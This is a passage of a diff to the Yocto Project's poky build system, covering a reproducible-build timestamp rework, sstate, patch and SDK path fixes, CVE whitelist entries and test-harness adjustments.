+743,8 @@ do_package_write_rpm[dirs] = "${PKGWRITEDIRRPM}" do_package_write_rpm[cleandirs] = "${PKGWRITEDIRRPM}" do_package_write_rpm[umask] = "022" do_package_write_rpm[depends] += "${@oe.utils.build_depends_string(d.getVar('PACKAGE_WRITE_DEPS'), 'do_populate_sysroot')}" -addtask package_write_rpm after do_packagedata do_package +EPOCHTASK ??= "" +addtask package_write_rpm after do_packagedata do_package ${EPOCHTASK} PACKAGEINDEXDEPS += "rpm-native:do_populate_sysroot" PACKAGEINDEXDEPS += "createrepo-c-native:do_populate_sysroot" diff --git a/poky/meta/classes/patch.bbclass b/poky/meta/classes/patch.bbclass index 25ec089ae1..484d27ac76 100644 --- a/poky/meta/classes/patch.bbclass +++ b/poky/meta/classes/patch.bbclass @@ -131,6 +131,9 @@ python patch_do_patch() { patchdir = parm["patchdir"] if not os.path.isabs(patchdir): patchdir = os.path.join(s, patchdir) + if not os.path.isdir(patchdir): + bb.fatal("Target directory '%s' not found, patchdir '%s' is incorrect in patch file '%s'" % + (patchdir, parm["patchdir"], parm['patchname'])) else: patchdir = s @@ -147,12 +150,12 @@ python patch_do_patch() { patchset.Import({"file":local, "strippath": parm['striplevel']}, True) except Exception as exc: bb.utils.remove(process_tmpdir, True) - bb.fatal(str(exc)) + bb.fatal("Importing patch '%s' with striplevel '%s'\n%s" % (parm['patchname'], parm['striplevel'], str(exc))) try: resolver.Resolve() except bb.BBHandledException as e: bb.utils.remove(process_tmpdir, True) - bb.fatal(str(e)) + bb.fatal("Applying patch '%s' on target directory '%s'\n%s" % (parm['patchname'], patchdir, str(e))) bb.utils.remove(process_tmpdir, True) del os.environ['TMPDIR'] diff --git a/poky/meta/classes/populate_sdk_base.bbclass b/poky/meta/classes/populate_sdk_base.bbclass index b46f1aed27..396792f0f7 100644 --- a/poky/meta/classes/populate_sdk_base.bbclass +++ b/poky/meta/classes/populate_sdk_base.bbclass @@ -275,6 +275,7 @@ EOF # substitute variables sed -i -e 's#@SDK_ARCH@#${SDK_ARCH}#g' \ -e 's#@SDKPATH@#${SDKPATH}#g' \ + -e 's#@SDKPATHINSTALL@#${SDKPATHINSTALL}#g' \ -e 's#@SDKEXTPATH@#${SDKEXTPATH}#g' \ -e 's#@OLDEST_KERNEL@#${SDK_OLDEST_KERNEL}#g' \ -e 's#@REAL_MULTIMACH_TARGET_SYS@#${REAL_MULTIMACH_TARGET_SYS}#g' \ diff --git a/poky/meta/classes/reproducible_build.bbclass b/poky/meta/classes/reproducible_build.bbclass index f06e00d70d..3c01dbd5b3 100644 --- a/poky/meta/classes/reproducible_build.bbclass +++ b/poky/meta/classes/reproducible_build.bbclass @@ -1,17 +1,38 @@ # reproducible_build.bbclass # -# Sets SOURCE_DATE_EPOCH in each component's build environment. +# Sets the default SOURCE_DATE_EPOCH in each component's build environment. +# The format is number of seconds since the system epoch. +# # Upstream components (generally) respect this environment variable, # using it in place of the "current" date and time. # See https://reproducible-builds.org/specs/source-date-epoch/ # -# After sources are unpacked but before they are patched, we set a reproducible value for SOURCE_DATE_EPOCH. -# This value should be reproducible for anyone who builds the same revision from the same sources. +# The default value of SOURCE_DATE_EPOCH comes from the function +# get_source_date_epoch_value which reads from the SDE_FILE, or if the file +# is not available (or set to 0) will use the fallback of +# SOURCE_DATE_EPOCH_FALLBACK. +# +# The SDE_FILE is normally constructed from the function +# create_source_date_epoch_stamp which is typically added as a postfuncs to +# the do_unpack task. If a recipe does NOT have do_unpack, it should be added +# to a task that runs after the source is available and before the +# do_deploy_source_date_epoch task is executed. +# +# If a recipe wishes to override the default behavior it should set it's own +# SOURCE_DATE_EPOCH or override the do_deploy_source_date_epoch_stamp task +# with recipe-specific functionality to write the appropriate +# SOURCE_DATE_EPOCH into the SDE_FILE. +# +# SOURCE_DATE_EPOCH is intended to be a reproducible value. This value should +# be reproducible for anyone who builds the same revision from the same +# sources. # -# There are 4 ways we determine SOURCE_DATE_EPOCH: +# There are 4 ways the create_source_date_epoch_stamp function determines what +# becomes SOURCE_DATE_EPOCH: # # 1. Use the value from __source_date_epoch.txt file if this file exists. -# This file was most likely created in the previous build by one of the following methods 2,3,4. +# This file was most likely created in the previous build by one of the +# following methods 2,3,4. # Alternatively, it can be provided by a recipe via SRC_URI. # # If the file does not exist: @@ -22,20 +43,16 @@ # 3. Use the mtime of "known" files such as NEWS, CHANGLELOG, ... # This works for well-kept repositories distributed via tarball. # -# 4. Use the modification time of the youngest file in the source tree, if there is one. +# 4. Use the modification time of the youngest file in the source tree, if +# there is one. # This will be the newest file from the distribution tarball, if any. # -# 5. Fall back to a fixed timestamp. +# 5. Fall back to a fixed timestamp (SOURCE_DATE_EPOCH_FALLBACK). # -# Once the value of SOURCE_DATE_EPOCH is determined, it is stored in the recipe's SDE_FILE. -# If none of these mechanisms are suitable, replace the do_deploy_source_date_epoch task -# with recipe-specific functionality to write the appropriate SOURCE_DATE_EPOCH into the SDE_FILE. -# -# If this file is found by other tasks, the value is exported in the SOURCE_DATE_EPOCH variable. -# SOURCE_DATE_EPOCH is set for all tasks that might use it (do_configure, do_compile, do_package, ...) +# Once the value is determined, it is stored in the recipe's SDE_FILE. BUILD_REPRODUCIBLE_BINARIES ??= '1' -inherit ${@oe.utils.ifelse(d.getVar('BUILD_REPRODUCIBLE_BINARIES') == '1', 'reproducible_build_simple', '')} +inherit reproducible_build_simple SDE_DIR = "${WORKDIR}/source-date-epoch" SDE_FILE = "${SDE_DIR}/__source_date_epoch.txt" @@ -77,49 +94,47 @@ python create_source_date_epoch_stamp() { import oe.reproducible epochfile = d.getVar('SDE_FILE') - # If it exists we need to regenerate as the sources may have changed - if os.path.isfile(epochfile): - bb.debug(1, "Deleting existing SOURCE_DATE_EPOCH from: %s" % epochfile) - os.remove(epochfile) + tmp_file = "%s.new" % epochfile source_date_epoch = oe.reproducible.get_source_date_epoch(d, d.getVar('S')) bb.debug(1, "SOURCE_DATE_EPOCH: %d" % source_date_epoch) bb.utils.mkdirhier(d.getVar('SDE_DIR')) - with open(epochfile, 'w') as f: + with open(tmp_file, 'w') as f: f.write(str(source_date_epoch)) + + os.rename(tmp_file, epochfile) } +EPOCHTASK = "do_deploy_source_date_epoch" + +# Generate the stamp after do_unpack runs +do_unpack[postfuncs] += "create_source_date_epoch_stamp" + def get_source_date_epoch_value(d): - cached = d.getVar('__CACHED_SOURCE_DATE_EPOCH') - if cached: + epochfile = d.getVar('SDE_FILE') + cached, efile = d.getVar('__CACHED_SOURCE_DATE_EPOCH') or (None, None) + if cached and efile == epochfile: return cached - epochfile = d.getVar('SDE_FILE') + if cached and epochfile != efile: + bb.debug(1, "Epoch file changed from %s to %s" % (efile, epochfile)) + source_date_epoch = int(d.getVar('SOURCE_DATE_EPOCH_FALLBACK')) - if os.path.isfile(epochfile): + try: with open(epochfile, 'r') as f: s = f.read() try: source_date_epoch = int(s) - # workaround for old sstate with SDE_FILE content being 0 - use SOURCE_DATE_EPOCH_FALLBACK - if source_date_epoch == 0 : - source_date_epoch = int(d.getVar('SOURCE_DATE_EPOCH_FALLBACK')) - bb.warn("SOURCE_DATE_EPOCH value from sstate '%s' is deprecated/invalid. Reverting to SOURCE_DATE_EPOCH_FALLBACK '%s'" % (s, source_date_epoch)) except ValueError: bb.warn("SOURCE_DATE_EPOCH value '%s' is invalid. Reverting to SOURCE_DATE_EPOCH_FALLBACK" % s) source_date_epoch = int(d.getVar('SOURCE_DATE_EPOCH_FALLBACK')) bb.debug(1, "SOURCE_DATE_EPOCH: %d" % source_date_epoch) - else: + except FileNotFoundError: bb.debug(1, "Cannot find %s. SOURCE_DATE_EPOCH will default to %d" % (epochfile, source_date_epoch)) - d.setVar('__CACHED_SOURCE_DATE_EPOCH', str(source_date_epoch)) + d.setVar('__CACHED_SOURCE_DATE_EPOCH', (str(source_date_epoch), epochfile)) return str(source_date_epoch) export SOURCE_DATE_EPOCH ?= "${@get_source_date_epoch_value(d)}" BB_HASHBASE_WHITELIST += "SOURCE_DATE_EPOCH" - -python () { - if d.getVar('BUILD_REPRODUCIBLE_BINARIES') == '1': - d.appendVarFlag("do_unpack", "postfuncs", " create_source_date_epoch_stamp") -} diff --git a/poky/meta/classes/rm_work.bbclass b/poky/meta/classes/rm_work.bbclass index 01c2ab1c78..2d5a56c238 100644 --- a/poky/meta/classes/rm_work.bbclass +++ b/poky/meta/classes/rm_work.bbclass @@ -73,7 +73,7 @@ do_rm_work () { # sstate version since otherwise we'd need to leave 'plaindirs' around # such as 'packages' and 'packages-split' and these can be large. No end # of chain tasks depend directly on do_package anymore. - rm -f $i; + rm -f -- $i; ;; *_setscene*) # Skip stamps which are already setscene versions @@ -90,7 +90,7 @@ do_rm_work () { ;; esac done - rm -f $i + rm -f -- $i esac done @@ -100,9 +100,9 @@ do_rm_work () { # Retain only logs and other files in temp, safely ignore # failures of removing pseudo folers on NFS2/3 server. if [ $dir = 'pseudo' ]; then - rm -rf $dir 2> /dev/null || true + rm -rf -- $dir 2> /dev/null || true elif ! echo "$excludes" | grep -q -w "$dir"; then - rm -rf $dir + rm -rf -- $dir fi done } diff --git a/poky/meta/classes/sstate.bbclass b/poky/meta/classes/sstate.bbclass index 2ff0d6850c..c2720cde92 100644 --- a/poky/meta/classes/sstate.bbclass +++ b/poky/meta/classes/sstate.bbclass @@ -640,10 +640,21 @@ python sstate_hardcode_path () { def sstate_package(ss, d): import oe.path + import time tmpdir = d.getVar('TMPDIR') + fixtime = False + if ss['task'] == "package": + fixtime = True + + def fixtimestamp(root, path): + f = os.path.join(root, path) + if os.lstat(f).st_mtime > sde: + os.utime(f, (sde, sde), follow_symlinks=False) + sstatebuild = d.expand("${WORKDIR}/sstate-build-%s/" % ss['task']) + sde = int(d.getVar("SOURCE_DATE_EPOCH") or time.time()) d.setVar("SSTATE_CURRTASK", ss['task']) bb.utils.remove(sstatebuild, recurse=True) bb.utils.mkdirhier(sstatebuild) @@ -656,6 +667,8 @@ def sstate_package(ss, d): # to sstate tasks but there aren't many of these so better just avoid them entirely. for walkroot, dirs, files in os.walk(state[1]): for file in files + dirs: + if fixtime: + fixtimestamp(walkroot, file) srcpath = os.path.join(walkroot, file) if not os.path.islink(srcpath): continue @@ -677,6 +690,11 @@ def sstate_package(ss, d): bb.utils.mkdirhier(plain) bb.utils.mkdirhier(pdir) os.rename(plain, pdir) + if fixtime: + fixtimestamp(pdir, "") + for walkroot, dirs, files in os.walk(pdir): + for file in files + dirs: + fixtimestamp(walkroot, file) d.setVar('SSTATE_BUILDDIR', sstatebuild) d.setVar('SSTATE_INSTDIR', sstatebuild) @@ -796,7 +814,7 @@ sstate_task_postfunc[dirs] = "${WORKDIR}" sstate_create_package () { # Exit early if it already exists if [ -e ${SSTATE_PKG} ]; then - [ ! -w ${SSTATE_PKG} ] || touch ${SSTATE_PKG} + touch ${SSTATE_PKG} 2>/dev/null || true return fi @@ -830,7 +848,7 @@ sstate_create_package () { else rm $TFILE fi - [ ! -w ${SSTATE_PKG} ] || touch ${SSTATE_PKG} + touch ${SSTATE_PKG} 2>/dev/null || true } python sstate_sign_package () { @@ -859,12 +877,12 @@ python sstate_report_unihash() { # sstate_unpack_package () { tar -xvzf ${SSTATE_PKG} - # update .siginfo atime on local/NFS mirror - [ -O ${SSTATE_PKG}.siginfo ] && [ -w ${SSTATE_PKG}.siginfo ] && [ -h ${SSTATE_PKG}.siginfo ] && touch -a ${SSTATE_PKG}.siginfo - # Use "! -w ||" to return true for read only files - [ ! -w ${SSTATE_PKG} ] || touch --no-dereference ${SSTATE_PKG} - [ ! -w ${SSTATE_PKG}.sig ] || [ ! -e ${SSTATE_PKG}.sig ] || touch --no-dereference ${SSTATE_PKG}.sig - [ ! -w ${SSTATE_PKG}.siginfo ] || [ ! -e ${SSTATE_PKG}.siginfo ] || touch --no-dereference ${SSTATE_PKG}.siginfo + # update .siginfo atime on local/NFS mirror if it is a symbolic link + [ ! -h ${SSTATE_PKG}.siginfo ] || touch -a ${SSTATE_PKG}.siginfo 2>/dev/null || true + # update each symbolic link instead of any referenced file + touch --no-dereference ${SSTATE_PKG} 2>/dev/null || true + [ ! -e ${SSTATE_PKG}.sig ] || touch --no-dereference ${SSTATE_PKG}.sig 2>/dev/null || true + [ ! -e ${SSTATE_PKG}.siginfo ] || touch --no-dereference ${SSTATE_PKG}.siginfo 2>/dev/null || true } BB_HASHCHECK_FUNCTION = "sstate_checkhashes" @@ -950,10 +968,11 @@ def sstate_checkhashes(sq_data, d, siginfo=False, currentcount=0, summary=True, found.add(tid) if tid in missed: missed.remove(tid) - except: + except bb.fetch2.FetchError as e: missed.add(tid) - bb.debug(2, "SState: Unsuccessful fetch test for %s" % srcuri) - pass + bb.debug(2, "SState: Unsuccessful fetch test for %s (%s)" % (srcuri, e)) + except Exception as e: + bb.error("SState: cannot test %s: %s" % (srcuri, e)) if len(tasklist) >= min_tasks: bb.event.fire(bb.event.ProcessProgress(msg, len(tasklist) - thread_worker.tasks.qsize()), d) @@ -1041,6 +1060,10 @@ def setscene_depvalid(task, taskdependees, notneeded, d, log=None): if taskdependees[task][1] == "do_populate_lic": return True + # We only need to trigger deploy_source_date_epoch through direct dependencies + if taskdependees[task][1] == "do_deploy_source_date_epoch": + return True + # stash_locale and gcc_stash_builddir are never needed as a dependency for built objects if taskdependees[task][1] == "do_stash_locale" or taskdependees[task][1] == "do_gcc_stash_builddir": return True diff --git a/poky/meta/classes/testimage.bbclass b/poky/meta/classes/testimage.bbclass index c709384b91..b1aef626f7 100644 --- a/poky/meta/classes/testimage.bbclass +++ b/poky/meta/classes/testimage.bbclass @@ -193,6 +193,7 @@ def testimage_main(d): import json import signal import logging + import shutil from bb.utils import export_proxies from oeqa.core.utils.misc import updateTestData @@ -228,9 +229,10 @@ def testimage_main(d): tdname = "%s.testdata.json" % image_name try: - td = json.load(open(tdname, "r")) - except (FileNotFoundError) as err: - bb.fatal('File %s Not Found. Have you built the image with INHERIT+="testimage" in the conf/local.conf?' % tdname) + with open(tdname, "r") as f: + td = json.load(f) + except FileNotFoundError as err: + bb.fatal('File %s not found (%s).\nHave you built the image with INHERIT += "testimage" in the conf/local.conf?' % (tdname, err)) # Some variables need to be updates (mostly paths) with the # ones of the current environment because some tests require them. @@ -397,10 +399,17 @@ def testimage_main(d): get_testimage_result_id(configuration), dump_streams=d.getVar('TESTREPORT_FULLLOGS')) results.logSummary(pn) + + # Copy additional logs to tmp/log/oeqa so it's easier to find them + targetdir = os.path.join(get_testimage_json_result_dir(d), d.getVar("PN")) + os.makedirs(targetdir, exist_ok=True) + os.symlink(bootlog, os.path.join(targetdir, os.path.basename(bootlog))) + os.symlink(d.getVar("BB_LOGFILE"), os.path.join(targetdir, os.path.basename(d.getVar("BB_LOGFILE") + "." + d.getVar('DATETIME')))) + if not results or not complete: - bb.fatal('%s - FAILED - tests were interrupted during execution' % pn, forcelog=True) + bb.fatal('%s - FAILED - tests were interrupted during execution, check the logs in %s' % (pn, d.getVar("LOG_DIR")), forcelog=True) if not results.wasSuccessful(): - bb.fatal('%s - FAILED - check the task log and the ssh log' % pn, forcelog=True) + bb.fatal('%s - FAILED - also check the logs in %s' % (pn, d.getVar("LOG_DIR")), forcelog=True) def get_runtime_paths(d): """ diff --git a/poky/meta/classes/uninative.bbclass b/poky/meta/classes/uninative.bbclass index 1e19917a97..3c7ccd66f4 100644 --- a/poky/meta/classes/uninative.bbclass +++ b/poky/meta/classes/uninative.bbclass @@ -100,7 +100,7 @@ ${UNINATIVE_STAGING_DIR}-uninative/relocate_sdk.py \ ${UNINATIVE_LOADER} \ ${UNINATIVE_LOADER} \ ${UNINATIVE_STAGING_DIR}-uninative/${BUILD_ARCH}-linux/${bindir_native}/patchelf-uninative \ - ${UNINATIVE_STAGING_DIR}-uninative/${BUILD_ARCH}-linux${base_libdir_native}/libc*.so" % chksum) + ${UNINATIVE_STAGING_DIR}-uninative/${BUILD_ARCH}-linux${base_libdir_native}/libc*.so*" % chksum) subprocess.check_output(cmd, shell=True) with open(loaderchksum, "w") as f: diff --git a/poky/meta/classes/useradd.bbclass b/poky/meta/classes/useradd.bbclass index e5f3ba24f9..0f0ed3446d 100644 --- a/poky/meta/classes/useradd.bbclass +++ b/poky/meta/classes/useradd.bbclass @@ -230,6 +230,10 @@ fakeroot python populate_packages_prepend () { preinst += 'perform_useradd () {\n%s}\n' % d.getVar('perform_useradd') preinst += 'perform_groupmems () {\n%s}\n' % d.getVar('perform_groupmems') preinst += d.getVar('useradd_preinst') + # Expand out the *_PARAM variables to the package specific versions + for rep in ["GROUPADD_PARAM", "USERADD_PARAM", "GROUPMEMS_PARAM"]: + val = d.getVar(rep + "_" + pkg) or "" + preinst = preinst.replace("${" + rep + "}", val) d.setVar('pkg_preinst_%s' % pkg, preinst) # RDEPENDS setup diff --git a/poky/meta/classes/utils.bbclass b/poky/meta/classes/utils.bbclass index cd3d05709e..99f68f7505 100644 --- a/poky/meta/classes/utils.bbclass +++ b/poky/meta/classes/utils.bbclass @@ -233,7 +233,7 @@ create_cmdline_wrapper () { #!/bin/bash realpath=\`readlink -fn \$0\` realdir=\`dirname \$realpath\` -exec -a \`dirname \$realpath\`/$cmdname \`dirname \$realpath\`/$cmdname.real $cmdoptions "\$@" +exec -a \$realdir/$cmdname \$realdir/$cmdname.real $cmdoptions "\$@" END chmod +x $cmd } diff --git a/poky/meta/conf/bitbake.conf b/poky/meta/conf/bitbake.conf index 0141919021..91f003d6dd 100644 --- a/poky/meta/conf/bitbake.conf +++ b/poky/meta/conf/bitbake.conf @@ -421,8 +421,10 @@ PKGDATA_DIR = "${TMPDIR}/pkgdata/${MACHINE}" SDK_NAME_PREFIX ?= "oecore" SDK_NAME = "${SDK_NAME_PREFIX}-${SDK_ARCH}-${TUNE_PKGARCH}" -SDKPATH = "/usr/local/${SDK_NAME_PREFIX}-${SDK_ARCH}" +SDKPATH = "/usr/local/oe-sdk-hardcoded-buildpath" SDKPATHNATIVE = "${SDKPATH}/sysroots/${SDK_SYS}" +# The path to default to installing the SDK to +SDKPATHINSTALL = "/usr/local/${SDK_NAME_PREFIX}-${SDK_ARCH}" ################################################################## # Kernel info. @@ -500,7 +502,7 @@ HOSTTOOLS += " \ HOSTTOOLS += "${@'ip ping ps scp ssh stty' if (bb.utils.contains_any('IMAGE_CLASSES', 'testimage testsdk', True, False, d) or any(x in (d.getVar("BBINCLUDED") or "") for x in ["testimage.bbclass", "testsdk.bbclass"])) else ''}" # Link to these if present -HOSTTOOLS_NONFATAL += "aws gcc-ar gpg ld.bfd ld.gold nc pigz sftp socat ssh sudo" +HOSTTOOLS_NONFATAL += "aws gcc-ar gpg gpg-agent ld.bfd ld.gold nc pigz sftp socat ssh sudo" # Temporary add few more detected in bitbake world HOSTTOOLS_NONFATAL += "join nl size yes zcat" diff --git a/poky/meta/conf/distro/include/cve-extra-exclusions.inc b/poky/meta/conf/distro/include/cve-extra-exclusions.inc index cf07acce1d..e02a4d1fde 100644 --- a/poky/meta/conf/distro/include/cve-extra-exclusions.inc +++ b/poky/meta/conf/distro/include/cve-extra-exclusions.inc @@ -44,7 +44,14 @@ CVE_CHECK_WHITELIST += "CVE-2010-4756" # exposing this interface in an exploitable way CVE_CHECK_WHITELIST += "CVE-2020-29509 CVE-2020-29511" - +# db +# Since Oracle relicensed bdb, the open source community is slowly but surely replacing bdb with +# supported and open source friendly alternatives. As a result these CVEs are unlikely to ever be fixed. +CVE_CHECK_WHITELIST += "CVE-2015-2583 CVE-2015-2624 CVE-2015-2626 CVE-2015-2640 CVE-2015-2654 \ +CVE-2015-2656 CVE-2015-4754 CVE-2015-4764 CVE-2015-4774 CVE-2015-4775 CVE-2015-4776 CVE-2015-4777 \ +CVE-2015-4778 CVE-2015-4779 CVE-2015-4780 CVE-2015-4781 CVE-2015-4782 CVE-2015-4783 CVE-2015-4784 \ +CVE-2015-4785 CVE-2015-4786 CVE-2015-4787 CVE-2015-4788 CVE-2015-4789 CVE-2015-4790 CVE-2016-0682 \ +CVE-2016-0689 CVE-2016-0692 CVE-2016-0694 CVE-2016-3418 CVE-2020-2981" #### CPE update pending #### @@ -61,10 +68,6 @@ CVE_CHECK_WHITELIST += "CVE-2020-29509 CVE-2020-29511" # There was a proposed patch https://lists.gnu.org/archive/html/qemu-devel/2021-02/msg06098.html # however qemu maintainers are sure the patch is incorrect and should not be applied. -# flex:flex-native https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-6293 -# Upstream bug, still open: https://github.com/westes/flex/issues/414 -# Causes memory exhaustion so potential DoS but no buffer overflow, low priority - # wget https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-31879 # https://mail.gnu.org/archive/html/bug-wget/2021-02/msg00002.html # No response upstream as of 2021/5/12 diff --git a/poky/meta/conf/distro/include/default-distrovars.inc b/poky/meta/conf/distro/include/default-distrovars.inc index 433d4b6651..0240589c81 100644 --- a/poky/meta/conf/distro/include/default-distrovars.inc +++ b/poky/meta/conf/distro/include/default-distrovars.inc @@ -47,5 +47,5 @@ KERNEL_IMAGETYPES ??= "${KERNEL_IMAGETYPE}" # The CONNECTIVITY_CHECK_URIS are used to test whether we can succesfully # fetch from the network (and warn you if not). To disable the test set # the variable to be empty. -# Git example url: git://git.yoctoproject.org/yocto-firewall-test;protocol=git;rev=master +# Git example url: git://git.yoctoproject.org/yocto-firewall-test;protocol=git;rev=master;branch=master CONNECTIVITY_CHECK_URIS ?= "https://www.example.com/" diff --git a/poky/meta/conf/distro/include/maintainers.inc b/poky/meta/conf/distro/include/maintainers.inc index ef1e7fe2f4..1575fce8c7 100644 --- a/poky/meta/conf/distro/include/maintainers.inc +++ b/poky/meta/conf/distro/include/maintainers.inc @@ -4,7 +4,7 @@ # # Please submit any patches against recipes in meta to the # OE-Core mail list (openembedded-core@lists.openembedded.org) -# For recipes in meta-yocto please use the Poky list (poky@yoctoproject.org) +# For recipes in meta-yocto please use the Poky list (poky@lists.yoctoproject.org) # # If you have problems with or questions about a particular recipe, feel # free to contact the maintainer directly (cc:ing the appropriate mailing list @@ -576,6 +576,7 @@ RECIPE_MAINTAINER_pn-python3 = "Oleksandr Kravchuk diff --git a/poky/meta/files/toolchain-shar-extract.sh b/poky/meta/files/toolchain-shar-extract.sh index dd9342758b..4386b985bb 100644 --- a/poky/meta/files/toolchain-shar-extract.sh +++ b/poky/meta/files/toolchain-shar-extract.sh @@ -56,7 +56,8 @@ if ! xz -V > /dev/null 2>&1; then exit 1 fi -DEFAULT_INSTALL_DIR="@SDKPATH@" +SDK_BUILD_PATH="@SDKPATH@" +DEFAULT_INSTALL_DIR="@SDKPATHINSTALL@" SUDO_EXEC="" EXTRA_TAR_OPTIONS="" target_sdk_dir="" diff --git a/poky/meta/files/toolchain-shar-relocate.sh b/poky/meta/files/toolchain-shar-relocate.sh index ba873373e2..3ece04db0a 100644 --- a/poky/meta/files/toolchain-shar-relocate.sh +++ b/poky/meta/files/toolchain-shar-relocate.sh @@ -61,7 +61,7 @@ done | xargs -n100 file | grep ":.*\(ASCII\|script\|source\).*text" | \ -e "$target_sdk_dir/post-relocate-setup" \ -e "$target_sdk_dir/${0##*/}" | \ xargs -n100 $SUDO_EXEC sed -i \ - -e "s:$DEFAULT_INSTALL_DIR:$target_sdk_dir:g" \ + -e "s:$SDK_BUILD_PATH:$target_sdk_dir:g" \ -e "s:^#! */usr/bin/perl.*:#! /usr/bin/env perl:g" \ -e "s: /usr/bin/perl: /usr/bin/env perl:g" diff --git a/poky/meta/lib/buildstats.py b/poky/meta/lib/buildstats.py index 8627ed3c31..c52b6c3b72 100644 --- a/poky/meta/lib/buildstats.py +++ b/poky/meta/lib/buildstats.py @@ -43,8 +43,8 @@ class SystemStats: # depends on the heartbeat event, which fires less often. self.min_seconds = 1 - self.meminfo_regex = re.compile(b'^(MemTotal|MemFree|Buffers|Cached|SwapTotal|SwapFree):\s*(\d+)') - self.diskstats_regex = re.compile(b'^([hsv]d.|mtdblock\d|mmcblk\d|cciss/c\d+d\d+.*)$') + self.meminfo_regex = re.compile(rb'^(MemTotal|MemFree|Buffers|Cached|SwapTotal|SwapFree):\s*(\d+)') + self.diskstats_regex = re.compile(rb'^([hsv]d.|mtdblock\d|mmcblk\d|cciss/c\d+d\d+.*)$') self.diskstats_ltime = None self.diskstats_data = None self.stat_ltimes = None diff --git a/poky/meta/lib/oe/license.py b/poky/meta/lib/oe/license.py index c1274a61de..c4efbe142b 100644 --- a/poky/meta/lib/oe/license.py +++ b/poky/meta/lib/oe/license.py @@ -81,6 +81,9 @@ class FlattenVisitor(LicenseVisitor): def visit_Str(self, node): self.licenses.append(node.s) + def visit_Constant(self, node): + self.licenses.append(node.value) + def visit_BinOp(self, node): if isinstance(node.op, ast.BitOr): left = FlattenVisitor(self.choose_licenses) @@ -234,6 +237,9 @@ class ListVisitor(LicenseVisitor): def visit_Str(self, node): self.licenses.add(node.s) + def visit_Constant(self, node): + self.licenses.add(node.value) + def list_licenses(licensestr): """Simply get a list of all licenses mentioned in a license string. Binary operators are not applied or taken into account in any way""" diff --git a/poky/meta/lib/oe/reproducible.py b/poky/meta/lib/oe/reproducible.py index 204b9bd734..0938e4cb39 100644 --- a/poky/meta/lib/oe/reproducible.py +++ b/poky/meta/lib/oe/reproducible.py @@ -41,7 +41,7 @@ def find_git_folder(d, sourcedir): for root, dirs, files in os.walk(workdir, topdown=True): dirs[:] = [d for d in dirs if d not in exclude] if '.git' in dirs: - return root + return os.path.join(root, ".git") bb.warn("Failed to find a git repository in WORKDIR: %s" % workdir) return None diff --git a/poky/meta/lib/oe/utils.py b/poky/meta/lib/oe/utils.py index 83d298906b..3e016244c5 100644 --- a/poky/meta/lib/oe/utils.py +++ b/poky/meta/lib/oe/utils.py @@ -481,7 +481,8 @@ class ThreadedWorker(Thread): try: func(self, *args, **kargs) except Exception as e: - print(e) + # Eat all exceptions + bb.mainlogger.debug("Worker task raised %s" % e, exc_info=e) finally: self.tasks.task_done() diff --git a/poky/meta/lib/oeqa/core/target/ssh.py b/poky/meta/lib/oeqa/core/target/ssh.py index aefb576805..af4a67f266 100644 --- a/poky/meta/lib/oeqa/core/target/ssh.py +++ b/poky/meta/lib/oeqa/core/target/ssh.py @@ -34,6 +34,7 @@ class OESSHTarget(OETarget): self.timeout = timeout self.user = user ssh_options = [ + '-o', 'HostKeyAlgorithms=+ssh-rsa', '-o', 'UserKnownHostsFile=/dev/null', '-o', 'StrictHostKeyChecking=no', '-o', 'LogLevel=ERROR' diff --git a/poky/meta/lib/oeqa/manual/eclipse-plugin.json b/poky/meta/lib/oeqa/manual/eclipse-plugin.json index d77d0e673b..6c110d0656 100644 --- a/poky/meta/lib/oeqa/manual/eclipse-plugin.json +++ b/poky/meta/lib/oeqa/manual/eclipse-plugin.json @@ -44,7 +44,7 @@ "expected_results": "" }, "2": { - "action": "wget autobuilder.yoctoproject.org/pub/releases//machines/qemu/qemux86/qemu (ex:core-image-sato-sdk-qemux86-date-rootfs-tar-bz2) \nsource /opt/poky/version/environment-setup-i585-poky-linux \n\nExtract qemu with runqemu-extract-sdk /home/user/file(ex.core-image-sato-sdk-qemux86.bz2) \n/home/user/qemux86-sato-sdk \n\n", + "action": "wget https://downloads.yoctoproject.org/releases/yocto/yocto-$VERSION/machines/qemu/qemux86/ (ex:core-image-sato-sdk-qemux86-date-rootfs-tar-bz2) \nsource /opt/poky/version/environment-setup-i585-poky-linux \n\nExtract qemu with runqemu-extract-sdk /home/user/file(ex.core-image-sato-sdk-qemux86.bz2) \n/home/user/qemux86-sato-sdk \n\n", "expected_results": " Qemu can be lauched normally." }, "3": { @@ -60,7 +60,7 @@ "expected_results": "" }, "6": { - "action": "(d) QEMU: \nSelect this option if you will be using the QEMU emulator. Specify the Kernel matching the QEMU architecture you are using. \n wget autobuilder.yoctoproject.org/pub/releases//machines/qemu/qemux86/bzImage-qemux86.bin \n e.g: /home/$USER/yocto/adt-installer/download_image/bzImage-qemux86.bin \n\n", + "action": "(d) QEMU: \nSelect this option if you will be using the QEMU emulator. Specify the Kernel matching the QEMU architecture you are using. \n wget https://downloads.yoctoproject.org/releases/yocto/yocto-$VERSION/machines/qemu/qemux86/bzImage-qemux86.bin \n e.g: /home/$USER/yocto/adt-installer/download_image/bzImage-qemux86.bin \n\n", "expected_results": "" }, "7": { @@ -247,7 +247,7 @@ "execution": { "1": { "action": "Clone eclipse-poky source. \n \n - git clone git://git.yoctoproject.org/eclipse-poky \n\n", - "expected_results": "Eclipse plugin is successfully installed \n\nDocumentation is there. For example if you have release yocto-2.0.1 you will found on http://autobuilder.yoctoproject.org/pub/releases/yocto-2.0.1/eclipse-plugin/mars/ archive with documentation like org.yocto.doc-development-$date.zip \n \n" + "expected_results": "Eclipse plugin is successfully installed \n\nDocumentation is there. For example if you have release yocto-2.0.1 you will found on https://downloads.yoctoproject.org/releases/yocto/yocto-2.0.1/eclipse-plugin/mars/ archive with documentation like org.yocto.doc-development-$date.zip \n \n" }, "2": { "action": "Checkout correct tag. \n\n - git checkout / \n\n", diff --git a/poky/meta/lib/oeqa/runtime/cases/ksample.py b/poky/meta/lib/oeqa/runtime/cases/ksample.py index a9a1620ebd..9883aa9aa8 100644 --- a/poky/meta/lib/oeqa/runtime/cases/ksample.py +++ b/poky/meta/lib/oeqa/runtime/cases/ksample.py @@ -10,7 +10,7 @@ from oeqa.core.decorator.depends import OETestDepends from oeqa.core.decorator.data import skipIfNotFeature # need some kernel fragments -# echo "KERNEL_FEATURES_append += \" features\/kernel\-sample\/kernel\-sample.scc\"" >> local.conf +# echo "KERNEL_FEATURES_append = \" features\/kernel\-sample\/kernel\-sample.scc\"" >> local.conf class KSample(OERuntimeTestCase): def cmd_and_check(self, cmd='', match_string=''): status, 